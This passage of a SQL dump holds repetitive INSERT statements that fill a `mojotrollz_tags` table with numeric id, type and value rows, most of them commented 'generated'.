(`id`, `table`, `type`, `value`, `comment`) VALUES (15682, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15682, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15683, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15683, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15683, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15683, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15684, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15684, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15684, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15684, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15685, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15686, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15686, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15686, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15686, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15692, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15692, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15693, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15693, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15694, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15695, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15700, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15701, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15702, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15703, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15704, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15707, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15708, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15709, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15710, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15719, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15721, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15722, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15722, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15723, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15726, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15727, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15727, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15727, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15728, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15740, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15741, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15742, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15743, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15744, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15745, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15746, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15747, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15748, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15749, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15750, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15751, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15752, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15753, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15754, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15756, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15757, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15758, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15759, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15760, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15760, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15761, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15761, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15762, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15762, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15763, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15763, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15764, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15764, 1, 2, 1537, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15765, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15766, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15767, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15768, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15769, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15770, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15771, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15772, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15773, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15774, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15775, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15776, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15777, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15792, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15796, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15798, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15799, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15800, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15801, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15801, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15803, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15804, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15805, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15806, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15807, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15808, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15809, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15810, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15811, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15812, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15813, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15814, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15815, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15816, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15817, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15818, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15832, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15835, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15838, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15839, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15840, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15841, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15842, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15843, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15844, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15847, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15848, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15849, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15850, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15851, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15852, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15853, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15854, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15855, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15856, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15857, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15858, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15859, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15860, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15862, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15863, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15864, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15864, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15865, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15866, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15868, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15869, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15870, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15871, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15871, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15872, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15873, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15874, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15875, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15876, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15877, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15878, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15881, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15882, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15889, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15890, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15891, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15891, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15892, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15895, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15895, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15896, 1, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15896, 1, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15897, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15898, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (15903, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 